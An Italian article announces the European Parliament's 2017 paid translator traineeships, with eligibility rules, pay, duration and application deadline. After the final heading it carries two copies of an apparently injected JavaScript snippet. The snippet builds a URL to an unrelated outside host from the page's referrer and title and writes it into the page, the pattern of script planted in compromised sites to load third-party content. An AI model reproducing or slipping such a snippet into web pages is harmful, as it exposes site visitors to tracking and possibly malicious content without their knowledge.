Tirocini Parlamento Europeo traduttori 2017

Come ogni anno, il Parlamento Europeo apre le sue porte a giovani laureati dell’Unione Europea per tirocini nel campo della traduzione negli uffici di Lussemburgo. I tirocini sono retribuiti.

A chi sono rivolti

I tirocini Parlamento Europeo traduttori 2017 sono rivolti a cittadini di uno Stato membro dell’Unione Europea o di un Paese candidato che abbiano compiuto 18 anni alla data d’inizio del tirocinio e abbiano completato almeno tre anni di studi universitari, con rilascio del titolo di laurea. Sono richieste ottima conoscenza di una lingua ufficiale dell’Unione Europea o di un Paese candidato e conoscenza approfondita di almeno altre due lingue ufficiali dell’Unione Europea. Ai candidati è richiesto di non aver usufruito in precedenza di un tirocinio o di un impiego retribuito per più di quattro settimane consecutive a carico dell’Unione Europea.

L’importo e la durata

I tirocini Parlamento Europeo traduttori 2017 hanno durata pari a 3 mesi. La prossima data di inizio dei tirocini è il 1° ottobre 2017. È prevista una retribuzione di 1.252,62 euro al mese.

I requisiti

Per candidarsi ai tirocini Parlamento Europeo traduttori 2017 è richiesto il possesso dei seguenti requisiti:

  • cittadinanza di un Paese membro dell’Unione Europea o di un Paese candidato all’adesione;
  • età minima 18 anni;
  • diploma di laurea triennale;
  • ottima conoscenza di una lingua ufficiale dell’Unione Europea o di un Paese candidato all’adesione;
  • conoscenza approfondita di altre due lingue ufficiali dell’Unione Europea;
  • non aver usufruito in precedenza di un tirocinio o di un impiego retribuito per più di quattro settimane consecutive a carico dell’Unione Europea.

Come e quando presentare domanda

Per candidarsi ai tirocini Parlamento Europeo traduttori 2017 bisogna collegarsi alla pagina questa pagina (tirocini per laureati) o europarl.europa.eu. La scadenza per l’invio delle domande per i tirocini in partenza il 1° ottobre 2017 è alle ore 24.00 del 15 maggio 2017.

Bando tirocini Parlamento Europeo traduttori 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();